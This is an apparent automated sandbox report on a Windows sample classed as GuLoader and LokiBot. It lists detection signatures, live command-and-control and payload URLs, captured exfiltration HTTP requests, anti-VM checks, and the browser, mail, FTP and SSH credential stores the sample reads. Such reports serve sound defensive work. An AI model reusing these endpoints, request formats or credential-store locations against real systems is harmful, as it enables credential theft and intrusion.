Windows Analysis Report
HfJLn9erXb.exe

Overview

General Information

Sample Name: HfJLn9erXb.exe
Analysis ID: 829104
MD5: 049ecad4587538c292e3ebeee5947eb5
SHA1: 12aabeb19083dd114b7b94c836b031de3945d2c9
SHA256: cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: HfJLn9erXb.exe ReversingLabs: Detection: 51%
Source: HfJLn9erXb.exe Virustotal: Detection: 53%
Source: http://185.246.220.85/habrik/five/fre.php Avira URL Cloud: Label: malware
Source: HfJLn9erXb.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: HfJLn9erXb.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr
Source: Binary string: mshtml.pdb source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: mshtml.pdbUGP source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_0040626D FindFirstFileA,FindClose, 2_2_0040626D
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 2_2_00405732
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004026FE FindFirstFileA, 2_2_004026FE

Networking

Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49802 -> 185.246.220.85:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49802 -> 185.246.220.85:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49802 -> 185.246.220.85:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49802 -> 185.246.220.85:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49802 -> 185.246.220.85:80
Source: Joe Sandbox View IP Address: 85.95.248.49 85.95.248.49
Source: Joe Sandbox View IP Address: 185.246.220.85 185.246.220.85
Source: global traffic HTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: ruhsalgelisim.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 185.246.220.85 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE3769A Content-Length: 178 Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: HfJLn9erXb.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: HfJLn9erXb.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002310000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruhsalgelisim.com/jgEyxsZj50.ttf
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000626000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.0000000032480000.00000004.00001000.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/tft
Source: HfJLn9erXb.exe, 00000007.00000003.1356636697.000000003248A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown HTTP traffic detected: POST /habrik/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 185.246.220.85 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE3769A Content-Length: 178 Connection: close
Source: unknown DNS traffic detected: queries for: ruhsalgelisim.com
Source: global traffic HTTP traffic detected: GET /jgEyxsZj50.ttf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: ruhsalgelisim.com Cache-Control: no-cache
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 2_2_004051CF
Source: HfJLn9erXb.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1368
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_004031D6
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_00404A0E 2_2_00404A0E
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004065F6 2_2_004065F6
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_735D1A9C 2_2_735D1A9C
Source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs HfJLn9erXb.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Section loaded: edgegdi.dll
Source: HfJLn9erXb.exe Static PE information: invalid certificate
Source: HfJLn9erXb.exe ReversingLabs: Detection: 51%
Source: HfJLn9erXb.exe Virustotal: Detection: 53%
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File read: C:\Users\user\Desktop\HfJLn9erXb.exe
Source: HfJLn9erXb.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1368
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_004031D6
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File created: C:\Users\user\AppData\Roaming\fumigatorium
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File created: C:\Users\user\AppData\Local\Temp\nsk2AD0.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/19@1/2
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar, 2_2_004020D1
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 2_2_0040449B
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File written: C:\Users\user\AppData\Local\Temp\Kontos.ini
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: HfJLn9erXb.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: HfJLn9erXb.exe, 00000002.00000003.1006931572.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.2.dr
Source: Binary string: mshtml.pdb source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: mshtml.pdbUGP source: HfJLn9erXb.exe, 00000007.00000001.1217313379.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation

Source: Yara match File source: Process Memory Space: HfJLn9erXb.exe PID: 8604, type: MEMORYSTR
Source: Yara match File source: 00000002.00000002.1379713929.000000000348C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_735D2F20 push eax; ret 2_2_735D2F4E
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_03335F04 push es; ret 2_2_03335F06
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_033303E6 push 620F66DAh; iretd 2_2_033303EB
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_03330E2F push ds; ret 2_2_03330E38
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_0333208F push edx; retf 2_2_03332090
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 7_2_01665F04 push es; ret 7_2_01665F06
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 7_2_016603E6 push 620F66DAh; iretd 7_2_016603EB
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 7_2_01660E2F push ds; ret 7_2_01660E38
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 7_2_0166208F push edx; retf 7_2_01662090
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_735D1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 2_2_735D1A9C
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File created: C:\Users\user\AppData\Local\Temp\nsb2DEE.tmp\System.dll
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_0040626D FindFirstFileA,FindClose, 2_2_0040626D
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 2_2_00405732
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004026FE FindFirstFileA, 2_2_004026FE
Source: C:\Users\user\Desktop\HfJLn9erXb.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\HfJLn9erXb.exe API call chain: ExitProcess graph end node
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002318000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.0000000002324000.00000004.00000020.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1394683653.00000000022A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: HfJLn9erXb.exe, 00000002.00000002.1392688379.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: HfJLn9erXb.exe, 00000007.00000002.1396621417.0000000003E99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_735D1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 2_2_735D1A9C
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer, 2_2_00402D63
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Process created: C:\Users\user\Desktop\HfJLn9erXb.exe C:\Users\user\Desktop\HfJLn9erXb.exe
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_004031D6

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: HfJLn9erXb.exe PID: 2912, type: MEMORYSTR
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\HfJLn9erXb.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\HfJLn9erXb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: HfJLn9erXb.exe PID: 2912, type: MEMORYSTR